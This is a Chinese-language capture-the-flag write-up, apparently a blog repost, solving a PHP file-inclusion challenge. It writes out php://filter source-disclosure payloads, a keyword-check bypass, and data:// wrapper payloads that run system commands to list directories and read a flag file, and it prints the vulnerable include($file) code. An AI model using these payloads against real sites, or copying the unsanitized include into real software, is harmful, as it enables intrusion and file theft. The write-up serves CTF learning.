赞
踩
这题对我这个新手来说真的是一言难尽…太吃经验了,老手肯定是分分钟解决
$file
必须要有test
$file
是通过$_GET['file']
GET请求得到的且为?file=test
test.php
文件?尝试,输入test自动补php,index.php?file=test.php
,这是一个文件包含?
php://filter
读test.php
源码(看一下)
poc:?file=php://filter/read=convert.base64-encode/resource=test.
解码得
<?php
echo "flag_not_here";
?>
//....真无情
这个时候,还能干啥。。。。对,和题目最相关的文件除了test.php还有index.php,查看index.php源码,
$file
变量中是要有test这个词眼!。。。该怎么办?恰好,面对这种情况,小生有一点经验= ̄ω ̄=,细讲的话要涉及的到php://filter
协议的语法
正常语法是 php://filter/read(或是write)=xxxxx/resource=xxx.php
,仔细看哦,对应参数值都在url中有=号相对应,且以/
分割
这是不是意味着php://filter/read=xxxx/这里可以乱写呢/resource=xxx.php
?这个协议是靠关键字匹配参数,之外的部分为啥不能乱写?
回到题目验证
/?file=php://filter/read=convert.base64-encode/test我在这里乱写了啊/resource=index.
base64解码得
<?php
error_reporting(0);
$file=$_GET['file'];
$file=$file.'php';
echo $file."<br />";
if(preg_match('/test/is',$file)){
include ($file);
}else{
echo '$file must has test';
}
?>
确定了是include($file)
,使用data://text/plain
伪协议向$file
写入PHP代码,来进行命令执行!
/?file=data://test/plain,<?php eval(system('ls'));?>//test
?file=data://test/plain,<?php eval(system('ls /'));?>//test
?file=data://test/plain,<?php eval(system('cat /FFFFFFFL@GGGG'));?>//test
。。。(待更)
赞
踩
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。